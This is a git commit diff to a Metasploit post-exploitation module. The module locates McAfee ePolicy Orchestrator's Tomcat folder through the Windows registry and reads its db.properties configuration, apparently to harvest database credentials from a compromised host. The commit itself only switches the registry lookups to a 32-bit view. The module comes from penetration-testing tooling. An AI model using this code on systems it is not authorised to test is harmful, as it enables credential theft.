use REGISTRY_VIEW_32_BIT

unstable
Donny Maasland (Fox-IT) 2015-05-18 10:19:32 +02:00
parent 2721be946a
commit 30f7c651c9
1 changed files with 11 additions and 28 deletions

View File

@ -31,30 +31,14 @@ class Metasploit3 < Msf::Post
def run def run
# Find out where things are installed # Find out where things are installed
print_status("Finding Tomcat install path...") print_status("Finding Tomcat install path...")
subkeys = registry_enumkeys("HKLM\\Software\\Network Associates\\ePolicy Orchestrator",REGISTRY_VIEW_32_BIT)
# Check both normal and Wow6432Node keys if subkeys.nil? or subkeys.empty?
subkeys =
[
'HKLM\\Software\\Network Associates\\ePolicy Orchestrator',
'HKLM\\Software\\Wow6432Node\\Network Associates\\ePolicy Orchestrator'
]
epol_reg_keys = []
subkeys.each do |subkey|
key = registry_enumkeys(subkey)
if not key.nil?
epol_reg_keys.push(subkey)
end
end
if (epol_reg_keys.nil? or epol_reg_keys.empty?)
print_error ("ePO 4.6 Not Installed or No Permissions to RegKey") print_error ("ePO 4.6 Not Installed or No Permissions to RegKey")
return return
end end
# Get the db.properties file location # Get the db.properties file location
epol_reg_keys.each do |epol_reg_key| epol_reg_key = "HKLM\\Software\\Network Associates\\ePolicy Orchestrator"
dbprops_file = registry_getvaldata(epol_reg_key, "TomcatFolder") dbprops_file = registry_getvaldata(epol_reg_key, "TomcatFolder",REGISTRY_VIEW_32_BIT)
if dbprops_file == nil or dbprops_file == "" if dbprops_file == nil or dbprops_file == ""
print_error("Could not find db.properties file location") print_error("Could not find db.properties file location")
else else
@ -63,7 +47,6 @@ class Metasploit3 < Msf::Post
process_config(dbprops_file); process_config(dbprops_file);
end end
end end
end
def process_config(filename) def process_config(filename)
config = client.fs.file.new(filename, 'r') config = client.fs.file.new(filename, 'r')